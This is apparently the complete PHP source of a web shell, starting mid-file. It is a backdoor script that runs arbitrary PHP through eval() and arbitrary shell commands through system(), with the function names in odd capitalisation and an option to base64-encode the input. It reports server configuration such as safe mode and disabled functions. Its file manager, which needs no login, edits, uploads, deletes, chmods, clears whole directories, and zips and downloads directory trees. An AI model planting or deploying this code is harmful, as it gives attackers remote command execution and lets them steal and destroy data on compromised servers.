$v) { $_GET[$k]=stripslashes($_GET[$k]); } foreach ($_POST as $k=>$v) { $_POST[$k]=stripslashes($_POST[$k]); } } if (isset($_GET['e']) or isset($_POST['e'])) { if (isset($_POST['e'])) { $e=stripslashes($_POST['e']); } else { $e=stripslashes($_GET['e']); } if (isset($_REQUEST['encode'])) { $e=base64_decode($e); } if (isset($_REQUEST['text'])) { header('Content-type: text/plain'); } if (isset($_REQUEST['textarea'])) { echo ''; } else { eVAl($e); } exit; } if (isset($_GET['c']) or isset($_POST['c'])) { if (isset($_POST['c'])) { $c=stripslashes($_POST['c']); } else { $e=stripslashes($_GET['c']); } if (isset($_REQUEST['encode'])) { $c=base64_decode($c); } if (isset($_REQUEST['text'])) { header('Content-type: text/plain'); } if (isset($_REQUEST['textarea'])) { echo ''; } else { SysteM($c); } exit; } if (isset($_GET['in'])) { copy($_GET['in'],$_GET['to']); exit; } if (isset($_POST['in'])) { copy($_POST['in'],$_POST['to']); exit; } //-----------------// $ps=$_SERVER['PHP_SELF']; if (empty($_GET['zip']) and empty($_GET['download']) and empty($_GET['down'])) { echo ' ',$_SERVER['HTTP_HOST'],' (',$_SERVER['SERVER_ADDR'],') '; } /////////////////// //File Manager /////////////////// if (!isset($_GET['r']) and !isset($_GET['input']) and !isset($_GET['ren']) and !isset($_GET['setchmod']) and !isset($_GET['download']) and !isset($_GET['down']) and !isset($_GET['up']) and !isset($_GET['upload']) and !isset($_GET['chmod']) and !isset($_GET['rename']) and !isset($_GET['rmdir']) and !isset($_GET['made']) and !isset($_GET['create']) and !isset($_GET['del']) and !isset($_GET['deldir']) and !isset($_GET['f']) and !isset($_GET['edit']) and !isset($_GET['zip']) and !isset($_GET['com'])) { $sf=ini_get('safe_mode'); if (empty($sf)) { $sf='OFF'; } else if ($sf=='1') { $sf='ON'; } $ob=ini_get('open_basedir'); if (empty($ob)) { $ob='NONE'; } $df=ini_get('disable_functions'); if (empty($df)) { $df='NONE'; } echo 'File Manager
',php_uname(),'
Root: ',$_SERVER['DOCUMENT_ROOT'],'
Open Basedir: ',$ob,'
Safe Mode: ',$sf,'
Disable Functions: ',$df,'
'; if (empty($_GET['d'])) { $d='.*'; } else{ $d=$_GET['d']; } if ($d=='.*') { $vverh='.'.$d; } if ($d!=='.*') { $vverh=$d.'..*'; } $d=str_replace('/','*',$d); echo '
UP
Create File
Upload File
'; $d=str_replace('*','/',$d); echo 'Path: ',$d,'
DIR:'; $dir=opendir($d); while($file=readdir($dir)) { if(is_dir($d.'/'.$file)) { if ($file!='.' and $file!='..') { $mod=substr(sprintf("%o",fileperms($d.'/'.$file)),-3); $d=str_replace('/','*',$d); echo ''; $d=str_replace('*','/',$d); } } } echo '
',$file,' DIR ',$mod,' [zip] [clear] [rename] [chmod] [rmdir]
Files:'; $d=str_replace('*','/',$d); $dir=opendir($d); while($file=readdir($dir)) { if(is_file($d.'/'.$file)) { $mod=substr(sprintf("%o",fileperms($d.'/'.$file)),-3); $siz=round(filesize("$d/$file")/1024,2); $d=str_replace('/','*',$d); echo ''; $d=str_replace('*','/',$d); } } echo '
',$file,' (',$siz,' Kb) ',$mod,' [edit] [del] [rename] [chmod] [down]
'; } /////////////////// //Rename /////////////////// if (isset($_GET['ren'])) { echo 'Rename

'; } if (isset($_GET['rename'])) { $_GET['rename']=str_replace('*','/',$_GET['rename']); $newname=str_replace('*','/',$_POST['new_name']); echo 'Rename
'; $name=rename($_GET['rename'],$newname); if ($name) { echo 'Done!'; } else { echo'Error!'; } } /////////////////// //Upload /////////////////// if (isset($_GET['up'])) { echo 'Upload

DIR:

Save as:

'; } if (isset($_POST['upload'])) { $_POST['upload']=str_replace('*','/',$_POST['upload']); $new_name=trim($_POST['new_name']); if(copy($_FILES["file"]["tmp_name"],$_POST['upload'].$new_name)) { echo 'Done!'; } else { echo 'Error!'; } } /////////////////// //Download /////////////////// if (isset($_GET['download'])) { $down=str_replace('*','/',$_GET['download']); $file=file_get_contents($down); $name=explode('/',$down); $name=$name[count($name)-1]; header('Content-type: text/plain'); header('Content-disposition: attachment; filename='.$name); echo $file; exit; } /////////////////// //Chmods /////////////////// if (isset($_GET['chmod'])) { $_GET['chmod']=str_replace('*','/',$_GET['chmod']); echo 'Chmods
'; $mod=substr(sprintf("%o",fileperms($_GET['chmod'])),-3); $_GET['chmod']=str_replace('/','*',$_GET['chmod']); echo '

'; } if (isset($_GET['setchmod'])) { $_GET['setchmod']=str_replace('*','/',$_GET['setchmod']); echo 'Chmods
'; if (chmod($_GET['setchmod'],$_POST['chmods'])) { echo 'Chmod ',$_POST['chmods'],' Done!'; } else { echo 'Chmod ',$_POST['chmods'],' Error!'; } } /////////////////// //Full Clear Dir /////////////////// if (isset($_GET['rmdir'])) { $rmdir=str_replace('*','/',$_GET['rmdir']); echo 'Full Clear Dir
'; $ddir=clear($rmdir); if ($ddir) { echo 'Dir ',$rmdir,' was cleared!'; } else { echo 'Error!'; } } /////////////////// //Read File /////////////////// if (isset($_GET['r'])) { $read=str_replace('*','/',$_GET['r']); $file=file($read); echo 'Read File
'; if ($file) { $cnt=count($file); for($i='0';$i<$cnt;++$i) { $file[$i]=htmlspecialchars($file[$i]); echo '',$file[$i],'
'; } } else { echo 'Error!'; } } /////////////////// //Delete File /////////////////// if (isset($_GET['del'])) { $_GET['del']=str_replace('*','/',$_GET['del']); echo 'Delete File
'; $delete=unlink($_GET['del']); if ($delete) { echo 'File ',$_GET['del'],' was deleted!
'; } else { echo 'File ',$_GET['del'],' was NOT deleted!'; } } /////////////////// //Clear Dir /////////////////// if (isset($_GET['deldir'])) { $_GET['deldir']=str_replace('*','/',$_GET['deldir']); echo 'Clear Dir
'; $dir=opendir($_GET['deldir']); while($files=readdir($dir)) { if (is_file($_GET['deldir'].$files)) { $del=unlink($_GET['deldir'].$files); } if (is_dir($_GET['deldir'].$files) and $files!='.' and $files!='..') { $odir=opendir($_GET['deldir'].$files); while($reddir=readdir($odir)) { if (is_file($_GET['deldir'].$files.'/'.$reddir)) { $delet=unlink($_GET['deldir'].$files.'/'.$reddir); } } } } if ($del) { echo 'Files from ',$_GET['deldir'],' was deleted!'; } else { echo 'Files from ',$_GET['deldir'],' was NOT deleted!'; } if ($delet) { echo '
Files from directories in ',$_GET['deldir'],' was deleted!'; } else { echo'
Files from directories in ',$_GET['deldir'],' was NOT deleted!'; } } /////////////////// //Edit File /////////////////// if (isset($_GET['f'])) { $_GET['f']=str_replace('*','/',$_GET['f']); echo 'Edit File
'; $file=file_get_contents($_GET['f']); $file=htmlspecialchars($file); $_GET['f']=str_replace('/','*',$_GET['f']); echo '
'; } if (isset($_GET['edit'])) { $_GET['edit']=str_replace('*','/',$_GET['edit']); echo 'Edit File
'; $fp=fopen($_GET['edit'],'w'); fputs($fp,$_POST['text']); fclose($fp); if ($fp) { echo 'Done!'; } else { echo 'Error!'; } } /////////////////// //Create File /////////////////// if (isset($_GET['create'])) { echo 'Create File


'; } if (isset($_GET['made'])) { $_GET['made']=str_replace('*','/',$_GET['made']); echo 'Create File
'; $fp=fopen($_GET['made'].$_POST['new_name'],'w'); fputs($fp,$_POST['new_file']); fclose($fp); if ($fp) { echo 'File was created!'; } else { echo 'Error!'; } } /////////////////// //ZIP /////////////////// if (isset($_GET['zip'])) { $zip=str_replace('*','/',$_GET['zip']); class zipfile { var $datasec = array(); var $ctrl_dir = array(); var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00"; var $old_offset = 0; function add_file($data,$name) { $name=str_replace("\\","/",$name); $fr="\x50\x4b\x03\x04"; $fr.="\x14\x00"; $fr.="\x00\x00"; $fr.="\x08\x00"; $fr.="\x00\x00\x00\x00"; $unc_len=strlen($data); $crc=crc32($data); $zdata=gzcompress($data); $zdata=substr(substr($zdata,0,strlen($zdata)-4),2); $c_len=strlen($zdata); $fr.=pack("V",$crc); $fr.=pack("V",$c_len); $fr.=pack("V",$unc_len); $fr.=pack("v",strlen($name)); $fr.=pack("v",0); $fr.=$name; $fr.=$zdata; $fr.=pack("V",$crc); $fr.=pack("V",$c_len); $fr.=pack("V",$unc_len); $this->datasec[]=$fr; $new_offset=strlen(implode("",$this->datasec)); $cdrec="\x50\x4b\x01\x02"; $cdrec.="\x00\x00"; $cdrec.="\x14\x00"; $cdrec.="\x00\x00"; $cdrec.="\x08\x00"; $cdrec.="\x00\x00\x00\x00"; $cdrec.=pack("V",$crc); $cdrec.=pack("V",$c_len); $cdrec.=pack("V",$unc_len); $cdrec.=pack("v",strlen($name)); $cdrec.=pack("v",0); $cdrec.=pack("v",0); $cdrec.=pack("v",0); $cdrec.=pack("v",0); $cdrec.=pack("V",32); $cdrec.=pack("V",$this->old_offset); $this->old_offset=$new_offset; $cdrec.=$name; $this->ctrl_dir[]=$cdrec; } function file() { $data=implode("",$this->datasec); $ctrldir=implode("",$this->ctrl_dir); return $data. $ctrldir. $this->eof_ctrl_dir. pack("v",sizeof($this->ctrl_dir)). pack("v",sizeof($this->ctrl_dir)). pack("V",strlen($ctrldir)). pack("V",strlen($data)). "\x00\x00"; } function full_add_dir($dir) { global $zip; $d=str_replace($zip,'',$dir); $fdir=opendir($dir); while ($file=readdir($fdir)) { if ($file!='.' and $file!='..') { if (is_file($dir.$file)) { $this->add_file(file_get_contents($dir.$file),$d.$file); } else if (is_dir($dir.$file)) { $this->full_add_dir($dir.$file.'/'); } } } return $dir; } } $zipfile = new zipfile(); $zipfile->full_add_dir($zip); $name=explode('/',$zip); $file=$name[count($name)-2]; header('Content-type: application/octet-stream'); header('Content-disposition: attachment; filename='.$file.'.zip'); echo $zipfile->file(); exit; } /////////////////// //CMD /////////////////// if (isset($_GET['com'])) { if ($_GET['com']=='1') { $str='c'; } else { $str='e'; } echo ' Command (',$str,'):

Base64:
Text: Textarea:
'; } ////////////////////////////////////// echo '
Default | CMD | PHP
'; list($msec,$sec)=explode(chr(32),microtime()); echo round((($sec+$msec)-$HeadTime),5),' sec. '; exit; ?>